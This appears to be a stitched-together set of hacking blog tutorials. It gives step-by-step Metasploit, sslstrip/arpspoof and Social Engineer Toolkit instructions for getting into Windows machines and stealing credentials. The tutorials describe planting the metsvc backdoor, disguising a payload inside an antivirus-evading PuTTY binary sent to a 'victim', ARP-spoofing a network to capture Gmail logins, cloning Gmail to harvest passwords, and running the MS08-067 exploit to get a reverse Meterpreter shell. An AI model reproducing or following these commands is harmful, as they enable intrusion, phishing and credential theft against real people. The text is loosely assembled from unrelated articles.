This module gathers information about the files and file paths that logged on users have executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are parsed from the downloaded hive.
msf > use post/windows/gather/enum_muicache msf post(enum_muicache) > sessions ...sessions... msf post(enum_muicache) > set SESSION <session-id> msf post(enum_muicache) > show options ...show and set options... msf post(enum_muicache) > run
Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.
After going through all the hard work of exploiting a system, it's often a good idea to leave yourself an easier way back into the system later. This way, if the service you exploited is down or patched, you can still gain access to the system. This is where Alexander Sotirov's 'metsvc' comes in handy and was recently added to the Metasploit trunk. To read about the original implementation of metsvc, go to http://www.phreedom.org/software/metsvc/
Using this backdoor, you can gain a Meterpreter shell at any point.
One word of warning here before we go any further. Metsvc as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, you would either alter the source to require authentication, or filter out remote connections to the port through some other method.
How to bypass internet security using msfpayload and mafencode
I have posted so many articles on windows hacking using metasploit,using trojan etc,
Today i m go no show u hack windows using putty.
1st u must encode putty for bypass antivirus using metasploit and than set payload in putty for connection to victim machine.
Now you send this encode putty file send to victim when victim open this tool than payload set connection between attacker machine to victim machine and encode is use for bypass antivirus so antivirus is not detect virus in putty.
You got meterpreter shell in your machine in metasploit so you do anythings in u r victim machine using meterpreter shell
You install trojan(netcat),u sniffing password (firefox,windows logon etc),u add new user account etc.
You might be interested in some of our other articles:
This tool provides a demonstration of the HTTPS stripping attacks that I presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial. For more information on the attack, see the video from the presentation below.
in my case iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 7777
this command is use for all traffic on 80 port is redirect to port number 7777
step 3 : now time to run sslstrip
path - /pentest/web/sslstrip
./sslstrip.py -l <listenPort> -w <txt file name >
in my case
sslstrip.py -l 7777 -w mitm
-w command - write all date in one txt file
step 4 : Dont close this terminal , open new terminal and run arpspoof of sniff data from the victim PC in network
Run arpspoof to convince a network they should send their traffic to you
arpspoof -i <interface> -t <targetIP> <gatewayIP>
in my case arpspoof -i eth1 -t 192.168.1.102 192.168.1.1
IN VICTIM machine
IF u r blind successfull command than u r victim pc ip table is changed by arpspoof
so u r sniff victim's data.
when victim access his/her gmail account
so his/her open gmail site but this gmail site is not real but it is look like real site . one one difference - real gamil site is HTTPS but this is HTTP .
When ur victim enter his/her facebook Credential in this fake gmail website, arpspoof sniff this Credential and ssl strip is read this and write in txt file in u r /pentest/web/sslstrip.
SET is a menu driven based attack system, which is fairly unique when it comes to hacker tools. The decision not to make it command line was made because of how social-engineer attacks occur; it requires multiple scenarios, options, and customizations. If the tool had been command line based it would have really limited the effectiveness of the attacks and the inability to fully customize it based on your target. Let’s dive into the menu and do a brief walkthrough of each attack vector.
Social Engineer Toolkit (SET)-Credential Harvester Attack
step 1 : 1st open terminal and go to this following path
cd /pentext/exploit/set
and than enter
and type ./set for open Social Engineer Toolkit
IT's look like
step 2 : Select option 1 : Social-Engineering Attacks from the set toolkit menu
now in set toolkit the new menu is open
step 3 : Select option 2 : Website Attack Vectors
The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.
The credential harvester attack method is used when you don’t want to specifically get a shell but perform phishing attacks in order to obtain username and passwords from the system. In this attack vector, a website will be cloned, and when the victim enters in the user credentials, the usernames and passwords will be posted back to your machine and then the victim will be redirected back to the legitimate site.
now in set toolkit the new menu is open
step 5 : Select option 2 : Site cloner
now in set toolkit the new menu is open
step 6 : Now u enter ur target URL which u want clone ex. https://gmail.com
than enter.
Now Credential Harvester is runing on port 80 A attacker PC is ready for attack .
now an URL you should give to your victim http://<u r ip address>/
in my case
http://192.168.1.103/
IN VICTIM PC
When u r victim enter this url http://192.168.1.103/ . web browser open gmail website but this is fake site made by SET toolkit..
When ur victim enter his/her gmail Credential in this fake website , than fake website send Credential to attacker PC..
You got ur victim gmail Credential..:D
- - - - - VIDEO TUTORIAL - - - - -
If u want to learn How to use Credential Harvester Attack over the internet than click here(Youtube Video with HD print) If you have any questions, Feel free to ask. :D
In this article I will be showing you how to use Ms08_067_Netapi exploit in an Unpatched windows xp to gain access to the machine. The original name of the exploit is "Microsoft Server Service Relative Path Stack Corruption", This exploits helps bypassing NX on various operating systems and service packs, Before we jump into the actual exploitation process, i would suggest you taking some time looking at the exploit code here.
Step 1 - First of all turn on your Backtrack 5 virtual machine .
Step 2 - Next on your console type "msfconsole", This will load the metasploit framework.
Step 3 - Nexttype "use windows/smb/ms08_067_netapi" in the console.
Step 4 - Now after the exploit has been setup, you would need to enter the RHOST, RHOST refers to the iP address of the victim. You can get the windows host iP by issuing the "ipconfig" command in the command prompt.
Step 5 - Once the exploit is setup, it's time to setup a payload, In this case we will use a windows/meterpreter/reverse_tcp command in the shell, Next you need to set the proper lhost <attacker ip address> by issuing the command "lhost <iP address>".
Step 6 - Next issue the command "show options" to check to see if every thing is setup fine.
Step 7 - Once you are done with the assessment, just type "exploit" in the console
If u r blind successfully exploit than u r got meterpreter shell in u r backtrack pc
